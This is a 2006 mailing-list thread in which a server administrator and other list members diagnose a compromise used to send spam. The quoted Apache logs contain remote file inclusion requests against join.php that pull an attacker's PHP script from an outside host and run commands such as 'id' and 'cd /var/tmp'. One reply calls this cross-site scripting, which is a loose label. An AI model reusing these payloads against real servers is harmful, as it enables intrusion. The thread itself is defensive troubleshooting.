I don't think that's what this is. Form spam takes advantage of poorly-coded mail/contact forms and uses them to send mail to recipients other than those intended by the form designer. What's happening here is that the spammer is running their own code (downloaded into /tmp) to send the mail, a rather more serious situation.

On Tue, 23 May 2006, Les Mikesell wrote: > On Tue, 2006-05-23 at 02:45, Paul Howarth wrote: > > > I don't think that's what this is. Form spam takes advantage of > > poorly-coded mail/contact forms and uses them to send mail to recipients > > other than those intended by the form designer. > > > > What's happening here is that the spammer is running their own code > > (downloaded into /tmp) to send the mail, a rather more serious > > situation. An old version of awstats will get you into this club, as will some of the php based forum programs. All it takes is for someone to install one of these in a document root and not keep up with the updates. It is insanely trivial to exploit one of these boxes. It even gets logged in the http logs for all to see. The hardest part if figuring out when it actually happened so you can find it in the logs. > If you have ssh access open there's a fair chance that someone > has done a brute-force password guess. There is a lot of > that going around. Or you didn't apply all of the current > updates before exposing the system to the internet. I suspect if ssh had been compromised that the user would have been something other than apache. The passwd entry for apache generally looks something like this: apache:x:48:48:Apache:/var/www:/sbin/nologin. Given this entry an ssh login as apache would not be possible via brute force passwd attack vectors. Regards, Tom Diehl tdiehl(a)rogueind.com Spamtrap address mtd123(a)rogueind.com

-----BEGIN PGP SIGNATURE----- Version: GnuPG v1.4.3 (GNU/Linux) iD8DBQFEcyqNfw3TK8jhZrsRAppvAKDbltkHlIw4rZBy5ViUyOXgTdM+/wCfZTCb zn+nAEQsuKRMaka/0sFgLRQ= =omQu -----END PGP SIGNATURE-----

On Mon, 2006-05-22 at 23:11 -0400, CodeHeads wrote: > -----BEGIN PGP SIGNED MESSAGE----- > Hash: SHA1 > > On Tue, 23 May 2006 00:14:32 +0000 > replies-lists-redhat(a)listmail.innovate.net wrote: > > i haven't been following this topic in great detail, but i suspect that > > you have a form on your site that is being exploited for "form spam". > > if you're not familiar with this, search google for "form spam". > > > > - Rick > > > Rick, > Thank you, No, I have not heard of this. I don't think that's what this is. Form spam takes advantage of poorly-coded mail/contact forms and uses them to send mail to recipients other than those intended by the form designer. What's happening here is that the spammer is running their own code (downloaded into /tmp) to send the mail, a rather more serious situation. Paul.

-----BEGIN PGP SIGNATURE----- Version: GnuPG v1.4.3 (GNU/Linux) iD8DBQFEcylffw3TK8jhZrsRAq16AJ930YTN4X/cSN8NZEVHYfJYjQ/dfwCgmTED xgS0Iv+yX2HhWQkREzXW+SI= =CyYw -----END PGP SIGNATURE-----

On Tue, 2006-05-23 at 11:25 -0400, CodeHeads wrote: > -----BEGIN PGP SIGNED MESSAGE----- > Hash: SHA1 > > On Tue, 23 May 2006 08:45:30 +0100 Paul Howarth <paul(a)city-fan.org&gt; wrote: > > > On Mon, 2006-05-22 at 23:11 -0400, CodeHeads wrote: > > > -----BEGIN PGP SIGNED MESSAGE----- > > > Hash: SHA1 > > > > > > On Tue, 23 May 2006 00:14:32 +0000 > > > replies-lists-redhat(a)listmail.innovate.net wrote: > > > > i haven't been following this topic in great detail, but i suspect > > > > that you have a form on your site that is being exploited for "form > > > > spam". if you're not familiar with this, search google for "form > > > > spam". > > > > > > > > - Rick > > > > > > > > > Rick, > > > Thank you, No, I have not heard of this. > > > > I don't think that's what this is. Form spam takes advantage of > > poorly-coded mail/contact forms and uses them to send mail to recipients > > other than those intended by the form designer. > > > > What's happening here is that the spammer is running their own code > > (downloaded into /tmp) to send the mail, a rather more serious > > situation. > > > > Paul. > > > I might not know too much but I really think they are using my forms. I > found quite a few log entries. Here are a few. > 81.199.173.8 - - [22/May/2006:18:57:51 -0400] > "POST /topsites/sources/join.php?FORM%5burl%5d=owned&CONFIG%5bcaptcha%5d=1&CONFIG%5bpath%5d=http://www.tiffefermaintfashion.com/gbook/tmp/xzblog.txt? > HTTP/1.0" 200 5923 > > AOL: > 172.179.33.217 - - [21/May/2006:07:58:01 -0400] > "GET /topsites/sources/join.php?FORM%5burl%5d=owned&CONFIG%5bcaptcha%5d=1&CONFIG%5bpath%5d=http://xpl.netmisphere2.com/CMD.gif?&cmd=id > HTTP/1.1" 200 2374 > 172.179.33.217 - - [21/May/2006:07:58:20 -0400] > "GET /topsites/sources/join.php?FORM%5burl%5d=owned&CONFIG%5bcaptcha%5d=1&CONFIG%5bpath%5d=http://xpl.netmisphere2.com/CMD.gif?&cmd=w > HTTP/1.1" 200 2412 > 172.179.33.217 - - [21/May/2006:07:58:34 -0400] > "GET /topsites/sources/join.php?FORM%5burl%5d=owned&CONFIG%5bcaptcha%5d=1&CONFIG%5bpath%5d=http://xpl.netmisphere2.com/CMD.gif?&cmd=cd%20/var/tmp > HTTP/1.1" 200 2323 > > And the xpl.netmisphere2.com site has hacking information: > http://xpl.netmisphere2.com/ I think this outta be illegal!! Looks like an exploit of a cross-site scripting vulnerability in your join.php form. http://xpl.netmisphere2.com/CMD.gif is the cracker's PHP script that gets injected into your form, it's not an image at all. You need to turn off that form until you can get a fixed version of that application. And of course reinstall that system. Paul.

-----BEGIN PGP SIGNATURE----- Version: GnuPG v1.4.3 (GNU/Linux) iD8DBQFEczXHfw3TK8jhZrsRAnILAKCH0SHKRpaagUi3Fe4oJSiUWDvC5wCaAuCQ 5sR75hAfYXAmF2Cjh5suKfo= =4buC -----END PGP SIGNATURE-----